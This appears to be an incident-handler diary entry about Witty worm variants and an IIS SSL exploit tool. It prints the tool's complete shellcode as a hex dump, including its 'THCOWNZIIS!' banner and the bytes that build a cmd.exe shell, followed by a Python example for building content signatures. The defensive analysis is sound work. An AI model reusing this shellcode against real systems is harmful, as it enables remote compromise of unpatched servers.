Witty Traffic Request / Mailbag
Witty Traffic Request
Witty came out four weeks ago. We keep hearing rumors of variants but have no confirmation so far, and would like to request packet captures of any unusual traffic with source port 4000 (UDP, as the original worm used). Please include full packets, not just headers, so the payload can be compared against the original.
Mailbag
Some users are already reporting that the IIS SSL exploit is being used for remote compromise. There is no sign of a worm yet: the reports so far trace back to one known tool, and that tool currently only targets the English and German versions of Windows.
New tools that exploit the TCP and MS SSL vulnerabilities are being released. Now that some malware is effectively 'open source' (Phatbot, for example), it may only be a question of time before these exploits are incorporated into it.
So, once again: patch your systems!
Reference: http://www.f-secure.com/weblog/
Sample packet (hex dump of the exploit payload). Note the plaintext markers visible in the ASCII column: 'THCOWNZIIS!' near the start, 'WS2_32.DLL', and the pieces of 'cmd.exe' (pushed onto the stack four bytes at a time, so the string is not contiguous on the wire). They identify this particular tool and make an easy content signature, but a variant could change them trivially:
00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
BE 98 EB 23 7A 69 02 05 6C 59 F8 1D 9C DE 8C D1 ...#zi..lY......
4C 70 D4 03 F0 27 20 20 30 08 57 53 32 5F 33 32 Lp...' 0.WS2_32
2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 ED 2A .DLL........]..*
6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B 78 08 j0Yd...@..p...x.
8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B 1C 01 ._<.....[x...K..
F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB 31 C9 ..S$..SQR.[ ..1.
41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 84 C0 A1...4....1.....
75 F7 0F B6 45 05 8D 44 45 04 66 39 10 75 E1 66 u...E..DE.f9.u.f
31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 0C 4A 1.ZX^VPR+N.A...J
8B 04 88 01 F8 0F B6 4D 05 89 44 8D D8 FE 4D 05 .......M..D...M.
75 BE FE 4D 04 74 21 FE 4D 22 8D 5D 18 53 FF D0 u..M.t!.M".].S..
89 C7 6A 04 58 88 45 05 80 45 77 0A 8D 5D 74 80 ..j.X.E..Ew..]t.
6B 26 14 E9 78 FF FF FF 89 CE 31 DB 53 53 53 53 k&..x.....1.SSSS
56 46 56 FF D0 97 55 58 66 89 30 6A 10 55 57 FF VFV...UXf.0j.UW.
55 D4 4E 56 57 FF 55 CC 53 55 57 FF 55 D0 97 8D U.NVW.U.SUW.U...
45 88 50 FF 55 E4 55 55 FF 55 E8 8D 44 05 0C 94 E.P.U.UU.U..D...
53 68 2E 65 78 65 68 5C 63 6D 64 94 31 D2 8D 45 Sh.exeh\cmd.1..E
CC 94 57 57 57 53 53 FE C6 01 F2 52 94 8D 45 78 ..WWWSS....R..Ex
50 8D 45 88 50 B1 08 53 53 6A 10 FE CE 52 53 53 P.E.P..SSj...RSS
53 55 FF 55 EC 6A FF FF 55 E0 SU.U.j..U.
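As an added example (not part of the original diary or of the tool it describes), the following Python reads the hex dump printed above back into bytes and checks it for the three plaintext markers. It also shows the caveat a signature writer needs: 'cmd.exe' is not present as a contiguous string because the shellcode builds it with two `push imm32` instructions (opcode 0x68), so a naive grep misses it, while rebuilding the pushed dwords in reverse stack order recovers '\cmd.exe'. The dump text is copied from the page as the example's input; the function names are the example's own.

```python
import re

# The sample packet exactly as printed in the diary above (hex column plus
# ASCII column), embedded here as the example's input.
SAMPLE_DUMP = r"""
00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
BE 98 EB 23 7A 69 02 05 6C 59 F8 1D 9C DE 8C D1 ...#zi..lY......
4C 70 D4 03 F0 27 20 20 30 08 57 53 32 5F 33 32 Lp...' 0.WS2_32
2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 ED 2A .DLL........]..*
6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B 78 08 j0Yd...@..p...x.
8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B 1C 01 ._<.....[x...K..
F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB 31 C9 ..S$..SQR.[ ..1.
41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 84 C0 A1...4....1.....
75 F7 0F B6 45 05 8D 44 45 04 66 39 10 75 E1 66 u...E..DE.f9.u.f
31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 0C 4A 1.ZX^VPR+N.A...J
8B 04 88 01 F8 0F B6 4D 05 89 44 8D D8 FE 4D 05 .......M..D...M.
75 BE FE 4D 04 74 21 FE 4D 22 8D 5D 18 53 FF D0 u..M.t!.M".].S..
89 C7 6A 04 58 88 45 05 80 45 77 0A 8D 5D 74 80 ..j.X.E..Ew..]t.
6B 26 14 E9 78 FF FF FF 89 CE 31 DB 53 53 53 53 k&..x.....1.SSSS
56 46 56 FF D0 97 55 58 66 89 30 6A 10 55 57 FF VFV...UXf.0j.UW.
55 D4 4E 56 57 FF 55 CC 53 55 57 FF 55 D0 97 8D U.NVW.U.SUW.U...
45 88 50 FF 55 E4 55 55 FF 55 E8 8D 44 05 0C 94 E.P.U.UU.U..D...
53 68 2E 65 78 65 68 5C 63 6D 64 94 31 D2 8D 45 Sh.exeh\cmd.1..E
CC 94 57 57 57 53 53 FE C6 01 F2 52 94 8D 45 78 ..WWWSS....R..Ex
50 8D 45 88 50 B1 08 53 53 6A 10 FE CE 52 53 53 P.E.P..SSj...RSS
53 55 FF 55 EC 6A FF FF 55 E0 SU.U.j..U.
"""

_HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")


def parse_hex_dump(text: str, width: int = 16) -> bytes:
    """Turn a 'hex column + ASCII column' dump back into raw bytes.

    Leading tokens on each line are consumed while they look like a hex
    byte, at most `width` per line, so the ASCII column (which might itself
    start with hex-looking characters) is never mistaken for data.
    """
    out = bytearray()
    for line in text.splitlines():
        taken = 0
        for tok in line.split():
            if taken == width or not _HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
            taken += 1
    return bytes(out)


# Literal strings a content signature might look for (the third one is the
# trap: it is built on the stack, not present contiguously on the wire).
MARKERS = (b"THCOWNZIIS!", b"WS2_32.DLL", b"cmd.exe")


def find_markers(payload: bytes, markers=MARKERS) -> dict:
    """Offset of each literal marker in the payload, or -1 if absent."""
    return {m.decode(): payload.find(m) for m in markers}


def recover_pushed_strings(payload: bytes) -> list:
    """Rebuild strings that x86 shellcode pushes 4 bytes at a time.

    Heuristic, not a disassembler: every 0x68 (push imm32) followed by four
    printable bytes is treated as one push, consecutive pushes form a run,
    and because the stack grows downward the *last* push sits at the lowest
    address, so a run is joined in reverse to read as it does in memory.
    """
    runs, current, i = [], [], 0
    while i < len(payload):
        if payload[i] == 0x68 and i + 5 <= len(payload):
            imm = payload[i + 1:i + 5]
            if all(0x20 <= b < 0x7F for b in imm):
                current.append(imm)
                i += 5
                continue
        if current:
            runs.append(b"".join(reversed(current)).decode())
            current = []
        i += 1
    if current:
        runs.append(b"".join(reversed(current)).decode())
    return runs


PAYLOAD = parse_hex_dump(SAMPLE_DUMP)

if __name__ == "__main__":
    print(len(PAYLOAD), "bytes")
    print(find_markers(PAYLOAD))          # cmd.exe reports -1
    print(recover_pushed_strings(PAYLOAD))  # ['\\cmd.exe']
```

Run stand-alone it reports 330 bytes, finds 'THCOWNZIIS!' at offset 3 and 'WS2_32.DLL' at offset 42, reports 'cmd.exe' as absent, and recovers '\cmd.exe' from the two pushes. The practical lesson for a signature is to key on the bytes that are actually on the wire (the tool's banner string, or the push sequence `68 2E 65 78 65 68 5C 63 6D 64` itself) rather than on the string the shellcode eventually assembles.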
---------------------------------------------------------------
Handler on duty: Pedro Bueno (bueno_AT_ieee.org)